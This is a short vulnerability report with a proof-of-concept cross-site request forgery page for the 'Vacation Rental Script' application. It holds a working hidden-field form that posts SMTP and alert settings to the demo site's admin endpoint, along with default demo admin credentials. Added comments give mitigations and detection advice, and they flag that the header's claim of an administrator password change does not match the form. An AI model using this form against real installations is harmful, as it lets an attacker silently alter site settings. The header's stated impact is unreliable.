< ------------------- header data start ------------------- >


#############################################################

# Application Name : Vacation Rental Script

# Vulnerability Type : XSRF (cross-site request forgery, CSRF)

# Infection : Administrator password can be changed.

# author : BARCOD3 - Bug Researchers

# Demo : http://www.vacationrentalscript.com/demo/

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >
<!--
  Proof-of-concept markup for the XSRF (cross-site request forgery) report in the header.
  It is a stand-alone page, hosted outside the application, whose only content is a form
  that posts to the application's admin e-mail settings URL.

  What it shows for a defender: the request consists of ordinary settings fields only.
  No per-session or per-request anti-CSRF token is among them, so if the endpoint accepts
  this request it is presumably authorising on the administrator's session cookie alone
  (server-side behaviour is not visible here; confirm against the application).

  Mitigation on the application side: require an unpredictable token bound to the admin
  session on every state-changing request, reject requests whose Origin or Referer is not
  the application's own origin, and set the SameSite attribute on the session cookie.
  Detection: POSTs to the admin settings path that arrive with a foreign Origin or Referer.

  NOTE(review): the header describes an administrator password change, but the fields in
  this form are mail settings (smtp_password is the SMTP password). Confirm which setting
  the report actually covers.
-->
<h3>BARCOD3</h3>
<!-- Cross-origin multipart POST to the demo installation's admin e-mail settings endpoint. -->
<form id=settings_emails method=post action=http://www.vacationrentalscript.com/demo/admin/settings/emails/emails enctype=multipart/form-data>
<!-- Pre-filled SMTP host, user, password and port; all but the password field are hidden from the person viewing the page. -->
<input class=text type=hidden name=smtp_host id=smtp_host value=localhost />
<input class=text type=hidden name=smtp_user id=smtp_user value=username />
<input class=text type=password name=smtp_password id=smtp_password value=passWORD />
<input class=short-text type=hidden name=smtp_port id=smtp_port value=25 />
<!-- Pre-filled delete_old_system_alerts_days setting, also hidden. -->
<input class=short-text type=hidden name=delete_old_system_alerts_days id=delete_old_system_alerts_days value=1 />
<!-- The submit button is the only control besides the password box that is visible; the form carries no token field before it. -->
<input class=btn-orange type=submit value=Save settings id=submit name=submit />
</form>

*Note ;

Demo User; admin
Demo pass; admin
< -- bug code end of -- >